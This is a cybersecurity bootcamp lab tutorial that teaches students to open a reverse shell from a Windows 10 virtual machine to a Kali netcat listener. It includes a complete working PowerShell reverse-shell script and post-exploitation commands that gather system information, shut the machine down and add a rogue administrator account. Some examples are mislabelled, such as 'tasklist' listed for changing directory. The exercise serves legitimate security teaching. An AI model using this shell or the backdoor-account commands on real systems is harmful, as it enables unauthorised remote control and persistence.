Reverse shell and remote remote hacking a Windows machine

Before you start...

We need you! These exercises are created and maintained in collaboration with people like you. If you find any errors or typos, please contribute and/or report them.

🌱 How to Start This Project

This exercise aims to utilize Windows CMD commands in the context of a remote connection, simulating a remote hacking attack. This tutorial will help you establish a reverse shell from a Windows 10 machine to a Kali Linux machine, executing a series of commands to gather critical information from the Windows system. All of this will be done in a controlled environment, using virtual machines, and will focus on the post-exploitation phase of an ethical attack.

Requirements

• Attacker Machine (Kali Linux):
  • Required Software: Netcat (pre-installed on Kali Linux)
• Target Machine (Windows 10):
  • Access to PowerShell and permission to run scripts

Both virtual machines must be configured with the bridged adapter option so they can communicate over the local network.

📝 Instructions

1. Network Configuration: Verify that both machines can communicate using the ping command from Kali to Windows and vice versa.

2. Establish the connection with Netcat on the Kali Linux machine (Attacker). Open a terminal and listen on a specific port (in this case, port 4444) using Netcat:

1nc -lvnp 4444

This will set up a listener on the Kali machine, waiting for a connection from Windows.

1. Open PowerShell on the Windows 10 machine (Target) and execute the following script to establish the reverse shell:

1     $client = New-Object System.Net.Sockets.TCPClient("IP-de-Kali", 4444);
2     $stream = $client.GetStream();
3     $reader = New-Object System.IO.StreamReader($stream);
4     $writer = New-Object System.IO.StreamWriter($stream);
5     $writer.AutoFlush = $true;
6
7     while ($true) {
8         $data = $reader.ReadLine();
9         
10         
11         if ($data -eq "exit") { break }
12
13         try {
14             $result = Invoke-Expression $data 2>&1 | Out-String;
15             $writer.WriteLine($result);
16         } catch {
17             $writer.WriteLine("Error: $_");
18         }
19
20         $writer.Flush();
21     }

Note: Remember to replace "IP-of-Kali" with the IP address of your Kali Linux machine.

With the script running on Windows, you can now send commands from Kali through the Netcat session you initiated. Here are some useful commands to interact with the Windows machine:

Basic Windows Commands:

• List files in the current directory:

1dir

• Get system information:

1systeminfo

• Get network configuration::

1ipconfig

• List running processes:

1tasklist

Commands for Detailed Information:

• View system information:

  1hostname

• List users on the system:

  1net user

• View active network connections::

  1netstat -an

Commands for Navigating the File System:

• Change directory::

  1tasklist

• Create a file or directory::

  1mkdir C:\TestFolder

Administrative Commands (if you have privileges):

• Shut down or restart the system::

  1shutdown /s /t 0   # Apagar
  2shutdown /r /t 0   # Reiniciar

• Add an administrator user::

  1net user nuevo_usuario contraseña /add
  2net localgroup Administradores nuevo_usuario /add

  Research more commands to practice..

End the Session

• Esto hará que el bucle en PowerShell termine y cierre la conexión.

  1exit

Contributors

Thanks to these amazing people (emoji key):

1. Rosinni Rodriguez (rosinni) contribution: (build-tutorial) ✅, (documentation) 📖

2. Alejandro Sanchez (alesanchezr), contribution: (bug reports) 🐛

This project follows the all-contributors specification. Contributions of any kind are welcome!

This and other exercises are used to learn to code by students at 4Geeks Academy Coding Bootcamp led by Alejandro Sánchez and many other contributors. Learn more about our Programming Courses to become a Full Stack Developer, or our Data Science Bootcamp. You can also dive into cybersecurity with our Cybersecurity Bootcamp.